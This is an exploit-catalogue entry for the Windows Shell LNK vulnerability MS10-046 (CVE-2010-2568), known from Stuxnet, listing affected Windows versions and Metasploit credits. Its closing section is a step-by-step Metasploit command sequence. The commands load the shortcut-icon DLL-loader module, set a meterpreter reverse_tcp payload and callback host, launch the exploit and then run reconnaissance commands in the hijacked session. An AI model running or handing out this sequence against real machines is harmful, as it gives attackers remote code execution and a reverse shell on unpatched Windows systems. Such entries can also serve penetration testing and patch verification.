MS10-046 : Microsoft Windows Shell LNK Execution

Timeline :

Vulnerability discovered exploited in the wild, part of the Stuxnet worm
Metasploit PoC provided the 2010-07-19

PoC provided by :

hdmoore
jduck
B_H

Reference(s) :

CVE-2010-2568
MS10-046

Affected version(s) :

Windows XP SP3
Windows XP Professional x64 Edition SP2
Windows Server 2003 SP2
Windows Server 2003 x64 Edition SP2
Windows Vista SP1 et Windows Vista SP2
Windows Vista x64 Edition SP1 et Windows Vista x64 Edition SP2
Windows Server 2008 32 et Windows Server 2008 32 SP2
Windows Server 2008 x64 et Windows Server 2008 x64 SP2
Windows 7 32
Windows 7 x64
Windows Server 2008 R2 x64

Tested on Windows XP SP3

Description :

This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK) that contain an icon resource pointing to a malicious DLL. This module creates a WebDAV service that can be used to run an arbitrary payload when accessed as a UNC path.

Commands :

use windows/browser/ms10_046_shortcut_icon_dllloader
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig